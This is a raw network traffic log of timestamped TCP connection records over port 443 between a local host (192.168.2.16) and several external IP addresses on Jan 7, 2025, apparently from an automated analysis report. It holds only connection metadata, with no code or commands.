                                                                      Jan 7, 2025 09:27:12.220175028 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.220181942 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.220231056 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.220254898 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.220262051 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.220357895 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.220906019 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.221045971 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.221074104 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.221100092 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.221159935 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.221159935 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.221169949 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.221837997 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.221872091 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.222044945 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.222054005 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.222121954 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.237026930 CET4434973335.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.237102032 CET4434973335.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.237281084 CET49733443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.237365007 CET49733443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.237385035 CET4434973335.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.237396002 CET49733443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.237451077 CET49733443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.237895012 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.237921953 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.237986088 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.238306999 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.238317966 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.260080099 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.260142088 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.260173082 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.260199070 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.260219097 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.260225058 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.260235071 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.260255098 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.260274887 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.260305882 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.260943890 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.260973930 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.261001110 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.261215925 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.261228085 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.264708042 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.264775991 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.264781952 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.307132959 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.309123993 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.309216976 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.309247971 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.309268951 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.309278965 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.309318066 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.309400082 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.309573889 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.309623957 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.309631109 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.309672117 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.309755087 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.309802055 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.309808016 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.309849024 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.310436964 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.310484886 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.311917067 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.311970949 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.312027931 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.312072039 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.312078953 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.312129974 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.312145948 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.312180042 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.312186003 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.312191963 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.312211990 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.312228918 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.313277006 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.313328028 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.313329935 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.313342094 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.313368082 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.313380957 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.313553095 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.313597918 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.313621044 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.313656092 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.313664913 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.313674927 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.313692093 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.314100981 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.314148903 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.314157009 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.314194918 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.314378023 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.314425945 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.315578938 CET49732443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.315592051 CET44349732104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.346560955 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.346626043 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.346693993 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.346709013 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.346785069 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.347048998 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.347090960 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.347098112 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.347145081 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.347148895 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.347553015 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.347575903 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.347605944 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.347615004 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.347623110 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.347640991 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.347646952 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.347683907 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.347688913 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.348208904 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.348237038 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.348244905 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.348251104 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.348289013 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.348361969 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.348417044 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.348445892 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.348485947 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.348491907 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.348530054 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.349205017 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.349277020 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.349315882 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.349322081 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.399497986 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.399507999 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.433270931 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.433305979 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.433324099 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.433332920 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.433450937 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.433454990 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.433752060 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.433758974 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.433801889 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.433808088 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.434150934 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.434182882 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.434195995 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.434201002 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.434232950 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.434577942 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.434624910 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.434631109 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.434664965 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.434675932 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.434720039 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.434793949 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.434839010 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.435496092 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.435544968 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.435601950 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.435645103 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.435731888 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.435780048 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.436525106 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.436580896 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.436613083 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.436655998 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.436712027 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.436755896 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.437396049 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.437427044 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.437460899 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.437465906 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.437494993 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.437520981 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.519917011 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.519982100 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.520019054 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.520071983 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.520103931 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.520170927 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.520297050 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.520348072 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.520519018 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.520560980 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.520617008 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.520673037 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.520894051 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.520932913 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.520945072 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.520950079 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.520977974 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.521003008 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.521399021 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.521433115 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.521450043 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.521454096 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.521464109 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.521488905 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.521508932 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.521512985 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.521548986 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.521550894 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.521591902 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.521663904 CET49734443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.521682978 CET44349734104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.523787975 CET49736443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.523813009 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.524002075 CET49736443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.524204016 CET49736443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.524214029 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.691423893 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.692087889 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.692099094 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.692497969 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.692835093 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.692899942 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.693006992 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.729130030 CET49737443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.729167938 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.729307890 CET49737443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.729552984 CET49737443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:12.729564905 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.739331007 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.819113970 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.819180965 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.819380999 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.819380999 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.819391966 CET4434973535.190.80.1192.168.2.16
                                                                      Jan 7, 2025 09:27:12.819421053 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.819433928 CET49735443192.168.2.1635.190.80.1
                                                                      Jan 7, 2025 09:27:12.973901987 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.974168062 CET49736443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.974184990 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.974533081 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.975023985 CET49736443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:12.975085974 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:12.975145102 CET49736443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.015331984 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.107711077 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.107786894 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.107943058 CET49736443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.108247995 CET49736443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.108264923 CET44349736104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.210980892 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.211265087 CET49737443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.211292028 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.211639881 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.212043047 CET49737443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.212115049 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.212315083 CET49737443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.259330988 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.361053944 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.361124039 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.361172915 CET49737443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.362091064 CET49737443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.362111092 CET44349737104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.364659071 CET49739443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.364698887 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.364762068 CET49739443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.364989042 CET49739443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.365006924 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.405597925 CET49740443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.405638933 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.405822039 CET49740443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.406024933 CET49740443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.406037092 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.842925072 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.843211889 CET49739443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.843241930 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.843595982 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.843890905 CET49739443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.843956947 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.844014883 CET49739443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.877471924 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.877778053 CET49740443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.877804995 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.878158092 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.878443956 CET49740443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.878504992 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.878556967 CET49740443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.887327909 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.919331074 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.970993996 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.971059084 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.971271992 CET49739443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.971735001 CET49739443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:13.971756935 CET44349739104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.999646902 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.999727011 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.999783993 CET49740443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:13.999797106 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.999808073 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:13.999845028 CET49740443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:14.000237942 CET49740443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:14.000253916 CET44349740104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:14.600265026 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:14.600316048 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:14.600435972 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:14.600634098 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:14.600649118 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.073596001 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.073986053 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.074013948 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.074357033 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.074676037 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.074820995 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.074827909 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.074906111 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.074909925 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.074949980 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.075026989 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.075037003 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.215697050 CET49678443192.168.2.1620.189.173.10
                                                                      Jan 7, 2025 09:27:15.317120075 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317174911 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317275047 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.317289114 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317298889 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317342043 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.317354918 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317383051 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317409039 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317428112 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.317434072 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317457914 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317471981 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.317476034 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.317528009 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.317987919 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.360702991 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.360728979 CET44349742104.18.95.41192.168.2.16
